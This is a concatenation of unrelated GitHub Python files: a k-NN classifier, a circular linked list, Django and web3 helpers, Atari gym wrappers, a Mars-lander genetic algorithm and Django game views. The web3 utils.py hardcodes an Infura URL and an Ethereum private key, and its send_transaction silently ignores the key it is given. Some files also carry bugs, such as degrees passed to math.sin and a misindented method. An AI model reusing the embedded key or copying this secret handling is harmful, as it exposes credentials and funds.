\"\"\"\n\n abs_dist = np.abs(X - x)\n nth_dist = np.sum(np.power(abs_dist, p), axis = 1)\n distances = np.power(nth_dist, (1 / p))\n return distances\n\n\n def min_distances(self, distances, y, k):\n \"\"\"\n Given the distance between each training observation and a given\n testing observation, computes the predicted label for the testing observation based\n off the median of label of the k nearest neighbors\n\n Parameters\n ----------\n distances : N x 1 vector of distances between each training observation and a\n certain testing observation\n y : labels of each training observation\n k : number of nearest neighbors to compare to the testing observation\n\n Returns\n -------\n median of the labels of the k nearest neighbors. 
If there is a tie, k will be\n decreased by one until the tie is broken \"\"\"\n\n while k > 0:\n min_distances = np.argpartition(distances, k)[:k]\n labels = y[min_distances]\n prediction = np.median(labels)\n if prediction.is_integer() or k == 1:\n return prediction\n else:\n k -= 1\n return prediction\n\n\n def classify(self, X_train, y_train, X_test, k = 3, dist_func = \"l2\", p = 3, kernel = None, **kwargs):\n \"\"\"\n Classifies a given matrix or feature vector of testing data by assigning\n each new feature a label based on the labels of the k nearest neighbors\n\n Parameters\n ----------\n X_train : N x D matrix consisting of N observations of training data\n y_train : N x 1 vector consisting of N labels, where each corresponds to \n the feature vector of X_train at the same index\n X_test : M x D matrix consisting of M observations of testing data\n k : number of nearest neighbors to compare to each testing observation\n dist_func : metric that determines distance between two vectors\n p : parameter used in the lp distance function\n kernel : function that will apply a pseudo projection of the features into a space\n of different dimensions\n kwargs : parameters specific to kernelized k nearest neighbors. See utils for more information\n\n Returns\n -------\n predictions of the labels for each feature vector in X_test\n\n Note\n ----\n The use of a kernel will only work if the given distance function is l2_distance \n \"\"\"\n\n func_map = {'l1': self.l1_distance, 'l2': self.l2_distance, 'lp' : self.lp_distance}\n\n kern = Kernel()\n kernel_map = {'rbf': kern.gaussian, 'polynomial' : kern.polynomial, 'sigmoid' : kern.sigmoid}\n\n if dist_func == 'l2':\n gen_dist = np.sum(X_train * X_train, axis = 1)\n\n if kernel:\n gen_dist = np.zeros(X_train.shape[0])\n for i in range(X_train.shape[0]):\n gen_dist[i] = kernel_map[kernel](X_train[i], X_train[i], **kwargs)\n\n pred = np.zeros(X_test.shape[0])\n for i in range(X_test.shape[0]):\n if dist_func == 'l2':\n if kernel is None:\n distances = func_map[dist_func](X_train, X_test[i], gen_dist, kernel)\n\n else:\n distances = func_map[dist_func](X_train, X_test[i], gen_dist, kernel_map[kernel], **kwargs)\n\n elif dist_func == 'lp':\n distances = func_map[dist_func](X_train, X_test[i], p = p)\n\n else:\n distances = func_map[dist_func](X_train, X_test[i])\n\n pred[i] = self.min_distances(distances, y_train, k)\n return pred\n\n\n","repo_name":"AustenSchunk/MachineLearningLibrary","sub_path":"libml/Models/NearestNeighbors.py","file_name":"NearestNeighbors.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"26556654087","text":"class Node:\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n\nclass LinkedList:\n def __init__(self, head=None, tail=None):\n self.head = head\n self.tail = tail\n\n def add(self, data):\n newNode = Node(data)\n current = self.head\n if self.head:\n while current.next is not self.head:\n current = current.next\n current.next = newNode\n tail = newNode\n tail.next = newNode\n newNode.next = self.head\n\n else:\n self.head = newNode\n tail = newNode\n tail.next = self.head\n\n def printList(self, first=None):\n self.first = first\n first = self.head\n if first is None:\n print(\"List is empty.\")\n return\n\n current = first\n # print(current.data)\n\n while True:\n print(current.data, \"-->\", end=\" \")\n current = current.next\n if current is self.head:\n break\n print(\"None\")\n\n\nobj = 
LinkedList()\n\nobj.add(8)\nobj.printList()\nobj.add(5)\nobj.printList()\nobj.add(6)\nobj.printList()\nobj.add(2)\nobj.printList()\n","repo_name":"shrutikatayde/DSAWITHPYTHON","sub_path":"LINKEDLIST/2_CIRCULAR LINKEDLIST/1_creation_traversing.py","file_name":"1_creation_traversing.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12593811053","text":"from web3 import Web3\nfrom django.utils import dateformat, formats\n\n\ndef attribute_dict_to_dict(dict_to_parse):\n # convert any 'AttributeDict' type found to 'dict'\n parsed_dict = dict(dict_to_parse)\n for key, val in parsed_dict.items():\n # check for nested dict structures to iterate through\n if 'dict' in str(type(val)).lower():\n parsed_dict[key] = attribute_dict_to_dict(val)\n # convert 'HexBytes' type to 'str'\n elif 'HexBytes' in str(type(val)):\n parsed_dict[key] = val.hex()\n return parsed_dict\n\n\ndef certificate_to_dictionary(certificate):\n # convert any certificate object to 'dict'\n dictionary = {\n 'name': certificate.name,\n 'surname': certificate.surname,\n 'date_of_birth': dateformat.format(certificate.date_of_birth, formats.get_format('DATE_FORMAT')),\n 'grade': certificate.grade,\n 'subject': certificate.subject,\n 'date_of_creation': dateformat.format(certificate.date_of_creation, formats.get_format('DATE_FORMAT')),\n }\n return dictionary\n\n\ndef get_transaction_by_hash(transaction_hash):\n w3 = Web3(Web3.HTTPProvider('https://goerli.infura.io/v3/c83796f78d1a468593d02c4e8c9b2e3e'))\n transaction = attribute_dict_to_dict(w3.eth.get_transaction(transaction_hash))\n return transaction\n\n\ndef send_transaction(message, address_to, address_from, private_key, amount):\n w3 = Web3(Web3.HTTPProvider('https://goerli.infura.io/v3/c83796f78d1a468593d02c4e8c9b2e3e'))\n address = '0x00583328725E92B2e9E45a0c96058c533B6aB76d'\n private_key = '0x0bd7acb0531d3cb2d4595475b3ef5f9027c4c1f0420e591cb2c1a0243c4b6a79'\n nonce = w3.eth.getTransactionCount(address)\n gas_price = w3.eth.gasPrice\n value = w3.toWei(amount, 'ether')\n signed_tx = w3.eth.account.signTransaction(dict(\n nonce=nonce,\n gasPrice=gas_price,\n gas=100000,\n to=address_to,\n value=value,\n data=message.encode('utf-8'),\n ), private_key)\n tx = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n tx_id = w3.toHex(tx)\n return tx_id\n\n\n","repo_name":"TomDiFrancesco/DjangoRedis","sub_path":"app/iacademy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32831999150","text":"\"\"\" Environment wrappers. 
\"\"\"\nfrom collections import deque\n\nimport cv2\nimport gym\nimport gym.spaces as spaces\nfrom gym.envs import atari\nimport numpy as np\nimport tensorflow as tf\nfrom collections import deque\n\nfrom util.env_batch import ParallelEnvBatch\ncv2.ocl.setUseOpenCL(False)\n\nclass NoopResetEnv(gym.Wrapper):\n def __init__(self, env, noop_max=30):\n \"\"\"Sample initial states by taking random number of no-ops on reset.\n No-op is assumed to be action 0.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.noop_max = noop_max\n self.override_num_noops = None\n self.noop_action = 0\n assert env.unwrapped.get_action_meanings()[0] == 'NOOP'\n\n def _reset(self, **kwargs):\n \"\"\" Do no-op action for a number of steps in [1, noop_max].\"\"\"\n self.env.reset(**kwargs)\n if self.override_num_noops is not None:\n noops = self.override_num_noops\n else:\n noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101\n assert noops > 0\n obs = None\n for _ in range(noops):\n obs, _, done, _ = self.env.step(self.noop_action)\n if done:\n obs = self.env.reset(**kwargs)\n return obs\n\n\n\n\nclass EpisodicLifeEnv(gym.Wrapper):\n def __init__(self, env):\n \"\"\"Make end-of-life == end-of-episode, but only reset on true game over.\n Done by DeepMind for the DQN and co. since it helps value estimation.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.lives = 0\n self.was_real_done = True\n\n def _step(self, action):\n obs, reward, done, info = self.env.step(action)\n self.was_real_done = done\n # check current lives, make loss of life terminal,\n # then update lives to handle bonus lives\n lives = self.env.unwrapped.ale.lives()\n if lives < self.lives and lives > 0:\n # for Qbert somtimes we stay in lives == 0 condtion for a few frames\n # so its important to keep lives > 0, so that we only reset once\n # the environment advertises done.\n done = True\n self.lives = lives\n return obs, reward, done, info\n\ndef _reset(self, **kwargs):\n \"\"\"Reset only when lives are exhausted.\n This way all states are still reachable even though lives are episodic,\n and the learner need not know about any of this behind-the-scenes.\n \"\"\"\n if self.was_real_done:\n obs = self.env.reset(**kwargs)\n else:\n # no-op step to advance from terminal/lost life state\n obs, _, _, _ = self.env.step(0)\n self.lives = self.env.unwrapped.ale.lives()\n return obs\n\n\nclass FireReset(gym.Wrapper):\n \"\"\" Makes fire action when reseting environment.\n\n Some environments are fixed until the agent makes the fire action,\n this wrapper makes this action so that the epsiode starts automatically.\n \"\"\"\n def __init__(self, env):\n super(FireReset, self).__init__(env)\n action_meanings = env.unwrapped.get_action_meanings()\n if len(action_meanings) < 3:\n raise ValueError(\n \"env.unwrapped.get_action_meanings() must be of length >= 3\"\n f\"but is of length {len(action_meanings)}\")\n if env.unwrapped.get_action_meanings()[1] != \"FIRE\":\n raise ValueError(\n \"env.unwrapped.get_action_meanings() must have 'FIRE' \"\n f\"under index 1, but is {action_meanings}\")\n\n def step(self, action):\n return self.env.step(action)\n\n def reset(self, **kwargs):\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(1)\n if done:\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(2)\n if done:\n self.env.reset(**kwargs)\n return obs\n\n\nclass FireResetEnv(gym.Wrapper):\n def __init__(self, env):\n \"\"\"Take action on reset for environments that are fixed until firing.\"\"\"\n 
gym.Wrapper.__init__(self, env)\n assert env.unwrapped.get_action_meanings()[1] == 'FIRE'\n assert len(env.unwrapped.get_action_meanings()) >= 3\n\n def _reset(self, **kwargs):\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(1)\n if done:\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(2)\n if done:\n self.env.reset(**kwargs)\n return obs\n\n\nclass StartWithRandomActions(gym.Wrapper):\n \"\"\" Makes a random number of random actions at the beginning of each\n episode. \"\"\"\n def __init__(self, env, max_random_actions=30):\n super(StartWithRandomActions, self).__init__(env)\n self.max_random_actions = max_random_actions\n self.real_done = True\n\n def step(self, action):\n obs, rew, done, info = self.env.step(action)\n self.real_done = info.get(\"real_done\", True)\n return obs, rew, done, info\n\n def reset(self, **kwargs):\n obs = self.env.reset()\n if self.real_done:\n num_random_actions = np.random.randint(self.max_random_actions + 1)\n for _ in range(num_random_actions):\n obs, _, _, _ = self.env.step(self.env.action_space.sample())\n self.real_done = False\n return obs\n\n\nclass ImagePreprocessing(gym.ObservationWrapper):\n \"\"\" Preprocesses image-observations by possibly grayscaling and resizing. \"\"\"\n def __init__(self, env, width=84, height=84, grayscale=True):\n super(ImagePreprocessing, self).__init__(env)\n self.width = width\n self.height = height\n self.grayscale = grayscale\n ospace = self.env.observation_space\n low, high, dtype = ospace.low.min(), ospace.high.max(), ospace.dtype\n if self.grayscale:\n self.observation_space = spaces.Box(low=low, high=high,\n shape=(width, height), dtype=dtype)\n else:\n obs_shape = (width, height) + self.observation_space.shape[2:]\n self.observation_space = spaces.Box(low=low, high=high,\n shape=obs_shape, dtype=dtype)\n\n def observation(self, observation):\n \"\"\" Performs image preprocessing. \"\"\"\n if self.grayscale:\n observation = cv2.cvtColor(observation, cv2.COLOR_RGB2GRAY)\n observation = cv2.resize(observation, (self.width, self.height),\n interpolation=cv2.INTER_AREA)\n return observation\n\n\nclass MaxBetweenFrames(gym.ObservationWrapper):\n \"\"\" Takes maximum between two subsequent frames. \"\"\"\n def __init__(self, env):\n if (isinstance(env.unwrapped, atari.AtariEnv) and\n \"NoFrameskip\" not in env.spec.id):\n raise ValueError(\"MaxBetweenFrames requires NoFrameskip in atari env id\")\n super(MaxBetweenFrames, self).__init__(env)\n self.last_obs = None\n\n def observation(self, observation):\n obs = np.maximum(observation, self.last_obs)\n self.last_obs = observation\n return obs\n\n def reset(self, **kwargs):\n self.last_obs = self.env.reset()\n return self.last_obs\n\n\nclass QueueFrames(gym.ObservationWrapper):\n \"\"\" Queues specified number of frames together along new dimension. 
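Stacking the most recent frames lets a feedforward policy infer motion (e.g. ball velocity) from frame-to-frame differences. 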
\"\"\"\n def __init__(self, env, nframes, concat=False):\n super(QueueFrames, self).__init__(env)\n self.obs_queue = deque([], maxlen=nframes)\n self.concat = concat\n ospace = self.observation_space\n if self.concat:\n oshape = ospace.shape[:-1] + (ospace.shape[-1] * nframes,)\n else:\n oshape = ospace.shape + (nframes,)\n self.observation_space = spaces.Box(ospace.low.min(), ospace.high.max(),\n oshape, ospace.dtype)\n\n\n def observation(self, observation):\n self.obs_queue.append(observation)\n return (np.concatenate(self.obs_queue, -1) if self.concat\n else np.dstack(self.obs_queue))\n\n def reset(self, **kwargs):\n obs = self.env.reset()\n for _ in range(self.obs_queue.maxlen - 1):\n self.obs_queue.append(obs)\n return self.observation(obs)\n\n\nclass SkipFrames(gym.Wrapper):\n \"\"\" Performs the same action for several steps and returns the final result.\n \"\"\"\n def __init__(self, env, nskip=4):\n super(SkipFrames, self).__init__(env)\n if (isinstance(env.unwrapped, atari.AtariEnv) and\n \"NoFrameskip\" not in env.spec.id):\n raise ValueError(\"SkipFrames requires NoFrameskip in atari env id\")\n self.nskip = nskip\n\n def step(self, action):\n total_reward = 0.0\n for _ in range(self.nskip):\n obs, rew, done, info = self.env.step(action)\n total_reward += rew\n if done:\n break\n return obs, total_reward, done, info\n\n def reset(self, **kwargs):\n return self.env.reset(**kwargs)\n\n\nclass ClipReward(gym.RewardWrapper):\n \"\"\" Modifes reward to be in {-1, 0, 1} by taking sign of it. \"\"\"\n def reward(self, reward):\n return np.sign(reward)\n\n\nclass TFSummaries(gym.Wrapper):\n \"\"\" Writes env summaries.\"\"\"\n def __init__(self, env, prefix=None, running_mean_size=100, step_var=None):\n super(TFSummaries, self).__init__(env)\n self.episode_counter = 0\n self.prefix = prefix or self.env.spec.id\n self.step_var = (step_var if step_var is not None\n else tf.train.get_global_step())\n\n nenvs = getattr(self.env.unwrapped, \"nenvs\", 1)\n self.rewards = np.zeros(nenvs)\n self.had_ended_episodes = np.zeros(nenvs, dtype=np.bool)\n self.episode_lengths = np.zeros(nenvs)\n self.reward_queues = [deque([], maxlen=running_mean_size)\n for _ in range(nenvs)]\n\n def should_write_summaries(self):\n \"\"\" Returns true if it's time to write summaries. \"\"\"\n return np.all(self.had_ended_episodes)\n\n def add_summaries(self):\n \"\"\" Writes summaries. 
\"\"\"\n tf.contrib.summary.scalar(\n f\"{self.prefix}/total_reward\",\n tf.reduce_mean([q[-1] for q in self.reward_queues]),\n step=self.step_var)\n tf.contrib.summary.scalar(\n f\"{self.prefix}/reward_mean_{self.reward_queues[0].maxlen}\",\n tf.reduce_mean([np.mean(q) for q in self.reward_queues]),\n step=self.step_var)\n tf.contrib.summary.scalar(\n f\"{self.prefix}/episode_length\",\n tf.reduce_mean(self.episode_lengths),\n step=self.step_var)\n if self.had_ended_episodes.size > 1:\n tf.contrib.summary.scalar(\n f\"{self.prefix}/min_reward\",\n min(q[-1] for q in self.reward_queues),\n step=self.step_var)\n tf.contrib.summary.scalar(\n f\"{self.prefix}/max_reward\",\n max(q[-1] for q in self.reward_queues),\n step=self.step_var)\n self.episode_lengths.fill(0)\n self.had_ended_episodes.fill(False)\n\n def step(self, action):\n obs, rew, done, info = self.env.step(action)\n self.rewards += rew\n self.episode_lengths[~self.had_ended_episodes] += 1\n\n info_collection = [info] if isinstance(info, dict) else info\n done_collection = [done] if isinstance(done, bool) else done\n done_indices = [i for i, info in enumerate(info_collection)\n if info.get(\"real_done\", done_collection[i])]\n for i in done_indices:\n if not self.had_ended_episodes[i]:\n self.had_ended_episodes[i] = True\n self.reward_queues[i].append(self.rewards[i])\n self.rewards[i] = 0\n\n if self.should_write_summaries():\n self.add_summaries()\n return obs, rew, done, info\n\n def reset(self, **kwargs):\n self.rewards.fill(0)\n self.episode_lengths.fill(0)\n self.had_ended_episodes.fill(False)\n return self.env.reset(**kwargs)\n\n\nclass MaxAndSkipEnv(gym.Wrapper):\n def __init__(self, env, skip=4):\n \"\"\"Return only every `skip`-th frame\"\"\"\n gym.Wrapper.__init__(self, env)\n # most recent raw observations (for max pooling across time steps)\n self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype='uint8')\n self._skip = skip\n\n def _step(self, action):\n \"\"\"Repeat action, sum reward, and max over last observations.\"\"\"\n total_reward = 0.0\n done = None\n for i in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n if i == self._skip - 2: self._obs_buffer[0] = obs\n if i == self._skip - 1: self._obs_buffer[1] = obs\n total_reward += reward\n if done:\n break\n # Note that the observation on the done=True frame\n # doesn't matter\n max_frame = self._obs_buffer.max(axis=0)\n\n return max_frame, total_reward, done, info\n\n\nclass WarpFrame(gym.ObservationWrapper):\n def __init__(self, env):\n \"\"\"Warp frames to 84x84 as done in the Nature paper and later work.\"\"\"\n gym.ObservationWrapper.__init__(self, env)\n self.width = 84\n self.height = 84\n self.observation_space = spaces.Box(low=0, high=255, shape=(self.height, self.width, 1))\n\n def _observation(self, frame):\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n frame = cv2.resize(frame, (self.width, self.height), interpolation=cv2.INTER_AREA)\n return frame[:, :, None]\n\n\nclass FrameStack(gym.Wrapper):\n def __init__(self, env, k):\n \"\"\"Stack k last frames.\n\n Returns lazy array, which is much more memory efficient.\n\n See Also\n --------\n baselines.common.atari_wrappers.LazyFrames\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.k = k\n self.frames = deque([], maxlen=k)\n shp = env.observation_space.shape\n self.observation_space = spaces.Box(low=0, high=255, shape=(shp[0], shp[1], shp[2] * k))\n\n def _reset(self):\n ob = self.env.reset()\n for _ in range(self.k):\n self.frames.append(ob)\n return 
self._get_ob()\n\n def _step(self, action):\n ob, reward, done, info = self.env.step(action)\n self.frames.append(ob)\n return self._get_ob(), reward, done, info\n\n def _get_ob(self):\n assert len(self.frames) == self.k\n return LazyFrames(list(self.frames))\n\n\nclass ScaledFloatFrame(gym.ObservationWrapper):\n def _observation(self, observation):\n # careful! This undoes the memory optimization, use\n # with smaller replay buffers only.\n return np.array(observation).astype(np.float32) / 255.0\n\nclass LazyFrames(object):\n def __init__(self, frames):\n \"\"\"This object ensures that common frames between the observations are only stored once.\n It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay\n buffers.\n\n This object should only be converted to numpy array before being passed to the model.\n\n You'd not believe how complex the previous solution was.\"\"\"\n self._frames = frames\n\n def __array__(self, dtype=None):\n out = np.concatenate(self._frames, axis=2)\n if dtype is not None:\n out = out.astype(dtype)\n return out\n\n\ndef make_atari(env_id):\n env = gym.make(env_id)\n assert 'NoFrameskip' in env.spec.id\n env = NoopResetEnv(env, noop_max=30)\n env = MaxAndSkipEnv(env, skip=4)\n return env\n\n\ndef wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):\n \"\"\"Configure environment for DeepMind-style Atari.\n \"\"\"\n if episode_life:\n env = EpisodicLifeEnv(env)\n if 'FIRE' in env.unwrapped.get_action_meanings():\n env = FireResetEnv(env)\n env = WarpFrame(env)\n if scale:\n env = ScaledFloatFrame(env)\n if clip_rewards:\n env = ClipReward(env)\n if frame_stack:\n env = FrameStack(env, 4)\n return env\n\n\ndef nature_dqn_env(env_id, nenvs=None, seed=None,\n summaries=True, clip_reward=True):\n \"\"\" Wraps env as in Nature DQN paper. 
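Builds the single-env stack (episodic life, fire reset, random no-ops, frame max and skip, 84x84 grayscale, 4-frame queue, optional reward clipping), or a ParallelEnvBatch of such envs when nenvs is given. 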
\"\"\"\n if \"NoFrameskip\" not in env_id:\n raise ValueError(f\"env_id must have 'NoFrameskip' but is {env_id}\")\n if nenvs is not None:\n if seed is None:\n seed = list(range(nenvs))\n if isinstance(seed, int):\n seed = [seed] * nenvs\n if len(seed) != nenvs:\n raise ValueError(f\"seed has length {len(seed)} but must have \"\n f\"length equal to nenvs which is {nenvs}\")\n\n env = ParallelEnvBatch([\n lambda i=i, env_seed=env_seed: nature_dqn_env(\n env_id, seed=env_seed, summaries=False, clip_reward=False)\n for i, env_seed in enumerate(seed)\n ])\n if summaries:\n env = TFSummaries(env, prefix=env_id)\n if clip_reward:\n env = ClipReward(env)\n return env\n\n env = gym.make(env_id)\n env.seed(seed)\n if summaries:\n env = TFSummaries(env)\n env = EpisodicLifeEnv(env)\n if \"FIRE\" in env.unwrapped.get_action_meanings():\n env = FireReset(env)\n env = StartWithRandomActions(env, max_random_actions=30)\n env = MaxBetweenFrames(env)\n env = SkipFrames(env, 4)\n env = ImagePreprocessing(env, width=84, height=84, grayscale=True)\n env = QueueFrames(env, 4)\n if clip_reward:\n env = ClipReward(env)\n return env\n","repo_name":"denklewer/yandex-rl-tasks","sub_path":"util/atari_wrappers_a2c.py","file_name":"atari_wrappers_a2c.py","file_ext":"py","file_size_in_byte":16581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12272864377","text":"import random\nimport math\n\n\nclass Fusee:\n\n def __init__(self, position, fuel, Commandes={}):\n self.x, self.y = position\n self.vx, self.vy = 0, 0\n\n self.fuel = fuel\n\n self.angle = 0\n self.power = 0\n\n self.but = (self.angle, self.power)\n\n self.Commandes = Commandes\n \n def maj(self, compteur, but_power, but_angle, Memoriser_lancement=True):\n if Memoriser_lancement is True:\n if (but_angle, but_power) != self.but:\n self.Commandes[compteur] = (but_angle, but_power)\n self.but = but_angle, but_power\n\n\n if self.fuel == 0:\n self.power = 0\n else:\n if self.power < but_power:\n self.power += 1\n elif self.power > but_power:\n self.power -= 1\n \n if self.angle < but_angle:\n self.angle += 15\n if self.angle > but_angle: self.angle = but_angle\n elif self.angle > but_angle:\n self.angle -= 15\n if self.angle < but_angle: self.angle = but_angle\n\n self.vx -= math.sin(self.angle) * self.power\n self.vy += math.cos(self.angle) * self.power\n\n\n self.vy += Game.pesanteur\n self.fuel -= self.power\n\n \nclass Game:\n next_id = 0\n Vitesse_max = (20, 40)\n pesanteur = -3.711\n\n def __init__(self, *args, **kwargs):\n if len(args) < 5:\n args = args[0]\n Terrain, terrain_largeur, terrain_hauteur, fuel, proba_commande = args\n\n self.Terrain = Terrain \n self.terrain_largeur, self.terrain_hauteur = terrain_largeur, terrain_hauteur\n\n #self.Trajectoire sert pour l'affichage et l'évaluation seulement\n # alors que self.fusee.Commandes sert pour les crossover et mutations\n self.Trajectoire = []\n \n self.proba_commande_angle, self.proba_commande_power = proba_commande\n\n self.fuel = fuel\n\n if len(kwargs) == 0:\n self.fusee = Fusee(self.Terrain.Pos_depart, self.fuel)\n self.vitesse_arrivee = self._jeu()\n else:\n self.fusee = Fusee(self.Terrain.Pos_depart, self.fuel, kwargs['Commandes'])\n self._init_rejouer()\n \n self.id = Game.next_id\n Game.next_id += 1\n \n def _init_rejouer(self):\n self.Trajectoire = []\n\n self.fusee.x, self.fusee.y = self.Terrain.Pos_depart\n self.fusee.vx, self.fusee.vy = 0, 0\n\n self.fusee.fuel = self.fuel\n\n self.fusee.angle = 0\n self.fusee.power = 0\n\n 
self.vitesse_arrivee = self.rejouer() \n\n def __str__(self):\n return str(self.vitesse_arrivee) + str(self.Trajectoire)\n\n def _toucherSol(self):\n if self.fusee.x > self.terrain_largeur or self.fusee.x < 0:\n return False\n \n x = self.fusee.x\n y = self.fusee.y\n\n for k in range(len(self.Terrain.Points)-1):\n xA, yA = self.Terrain.Points[k]\n xB, yB = self.Terrain.Points[k+1]\n\n if xA < x and x < xB:\n if y <= (yB - yA) * (x - xA) / (xB-xA) + yA:\n return True\n elif xA == xB:\n if y < yA or y < yB:\n if (self.Trajectoire[-2][0] - xA) * (self.Trajectoire[-1][0] - xA) < 0:\n return True\n \n if x == xA and y <= yA: return True\n if x == xB and y <= yB: return True\n \n return False\n \n def _piloter(self, but):\n nouv_angle, nouv_power = but\n\n r_changement_angle = random.random()\n r_changement_power = random.random()\n if self.proba_commande_angle >= r_changement_angle:\n nouv_angle = random.randint(-90, 90)\n if self.proba_commande_power >= r_changement_power:\n nouv_power = random.randint(0, 4)\n \n return (nouv_angle, nouv_power)\n\n def _jeu(self):\n but_power = random.randint(0,4)\n but_angle = random.randint(-90,90)\n\n compteur = 0\n while self._toucherSol() is not True:\n self.fusee.y += self.fusee.vy\n self.fusee.x += self.fusee.vx\n\n but_angle, but_power = self._piloter((but_angle, but_power))\n self.fusee.maj(compteur, but_power, but_angle) \n\n self.Trajectoire.append((self.fusee.x, self.fusee.y))\n compteur += 1\n return (self.fusee.vx, self.fusee.vy)\n\n def rejouer(self):\n but_power = self.fusee.power\n but_angle = self.fusee.angle\n\n compteur = 0\n while self._toucherSol() is not True:\n self.fusee.y += self.fusee.vy\n self.fusee.x += self.fusee.vx\n\n try:\n but_angle, but_power = self.fusee.Commandes[compteur]\n except KeyError: pass\n\n self.fusee.maj(compteur, but_power, but_angle, False) \n\n self.Trajectoire.append((self.fusee.x, self.fusee.y))\n compteur += 1\n return (self.fusee.vx, self.fusee.vy)\n\n def evaluer(self):\n i1, i2 = self.Terrain.Zones\n\n x1, y1 = self.Terrain.Points[i1]\n x2 = self.Terrain.Points[i2][0]\n x_centre = int((x1 + x2)/2)\n\n dx = self.fusee.x - x_centre\n dy = self.fusee.y - y1\n distance_centre = math.sqrt(dx**2 + dy**2)\n\n vx, vy = self.vitesse_arrivee\n max_x, max_y = Game.Vitesse_max\n\n ratio_x, ratio_y = vx / max_x, vy / max_y\n ratio = (ratio_x + ratio_y) / 2\n\n #INTERMEDIAIRE PAS DE VITESSE\n return distance_centre\n \n def mutation(self, proba_mutation):\n proba_mutation_angle, proba_mutation_power = proba_mutation\n\n une_mutation = False\n for k in self.fusee.Commandes.keys():\n r_muter_angle = random.random()\n r_muter_power = random.random()\n\n nouv_angle, nouv_power = self.fusee.Commandes[k]\n if proba_mutation_angle >= r_muter_angle:\n nouv_angle = random.randint(-90, 90)\n une_mutation = True\n if proba_mutation_power >= r_muter_power:\n nouv_power = random.randint(0, 4)\n une_mutation = True\n\n self.fusee.Commandes[k] = (nouv_angle, nouv_power)\n\n if une_mutation is True:\n self._init_rejouer()\n\n return une_mutation\n","repo_name":"yannisEF/Mars-landing","sub_path":"classe_game.py","file_name":"classe_game.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30434907964","text":"from random import randint\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.forms import UserCreationForm, User\nfrom django.shortcuts import render, 
redirect\nfrom django.utils import translation, timezone\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django.http import HttpResponseForbidden\n\n# Create your views here.\nfrom main.GameLogic import GENERATE_NEW_ITEM, LocalItem, ValidateItem, RemoveItem, EquipItem, ProcessLoots, SellLoot, \\\n doFilter, RemoveActiveBet, LocalHistory, LocalLoot, LocalBet\nfrom main.models import Character, Item, Loot, Bid, AuctionLog\n\n\ndef set_language(request, code):\n translation.activate(code)\n request.session[translation.LANGUAGE_SESSION_KEY] = code\n return redirect('/')\n\n\ndef index(request, msg=\"\"):\n if request.user.is_authenticated:\n\n current_user = request.user\n\n char, ok = Character.objects.get_or_create(user=current_user)\n\n context = {'char': char, 'user': current_user, 'msg': msg}\n\n return render(request, \"game.html\", context)\n else:\n return render(request, 'base.html')\n\n\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('index')\n else:\n form = UserCreationForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n\ndef getFreeGold(request):\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n r = randint(1, 100)\n char.gold += r\n char.save()\n\n return index(request, \"You have received \" + str(r) + \" gold.\")\n else:\n return HttpResponseForbidden()\n\n\ndef getItem(request):\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n NewItem = Item.objects.get(pk=GENERATE_NEW_ITEM(char.pk))\n\n return index(request, \"You have recived \" + NewItem.item_name + \".\")\n else:\n return HttpResponseForbidden()\n\n\ndef Inventory(request):\n if request.user.is_authenticated:\n\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n itemz = Item.objects.filter(character_id=char.pk)\n\n stats = [0, 0, 0, 0, 0, 0, 0]\n ilvl = 0\n\n LocalItems = []\n EqItem = [0, 0, 0, 0]\n\n for x in itemz:\n\n local_item = LocalItem(x)\n\n if (char.eq_armor == x or char.eq_helm == x or char.eq_weapon == x or char.eq_offhand == x):\n EqItem[x.item_tupe] = local_item\n ilvl += x.item_level\n for x in range(len(stats)):\n stats[x] += local_item.stats[x]\n elif not x.used:\n LocalItems.append(local_item)\n\n context = {'user': current_user, 'ilvl': ilvl, 'stats': stats, 'items': LocalItems, 'eq_items': EqItem}\n return render(request, 'inventory.html', context=context)\n\n else:\n return HttpResponseForbidden()\n\n\ndef ItemSwitch(request, item_id):\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n item = Item.objects.get(pk=item_id)\n if not item:\n return Inventory(request)\n\n # check if it's equeped\n if char.eq_weapon == item:\n RemoveItem(char, 0)\n elif char.eq_helm == item:\n RemoveItem(char, 1)\n elif char.eq_armor == item:\n RemoveItem(char, 2)\n elif char.eq_offhand == item:\n RemoveItem(char, 3)\n else:\n if not ValidateItem(char, item):\n return HttpResponseForbidden()\n\n RemoveItem(char, item.item_tupe)\n EquipItem(char, item)\n\n return Inventory(request)\n\n\n\n else:\n return 